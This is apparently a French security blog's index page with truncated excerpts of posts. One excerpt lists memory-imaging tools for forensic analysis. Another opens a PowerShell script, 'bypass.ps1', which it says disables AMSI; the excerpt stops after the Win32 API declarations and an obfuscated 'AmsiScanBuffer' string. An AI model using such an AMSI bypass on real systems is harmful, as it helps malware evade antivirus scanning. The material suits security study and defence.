Ce sont des systèmes de sécurité pour assurer l’intégrité et la sécurité du matériel informatique
Quelque outils permettent d’avoir un image de la mémoire FTK Image Redline DumpIt.exe win32dd.exe / win64dd.exe (support psexec) Ces outils permettent d’avoir un format raw de la mémoire. Sur windows, vous avez aussi le fichier d’hibernation %SystemDrive%/hiberfil.sys qui est une image compressée. Pour les machines virtuelles vmware : .vmem file Hyper-v : .bin file Parallels … Continuer la lecture
Ce script permet de désactiver AMSI //bypass.ps1 $MethodDefinition = " [DllImport(`"kernel32`")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport(`"kernel32`")] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport(`"kernel32`")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; $ABSD = 'AmsiS'+'canBuffer'; $handle … Continuer la lecture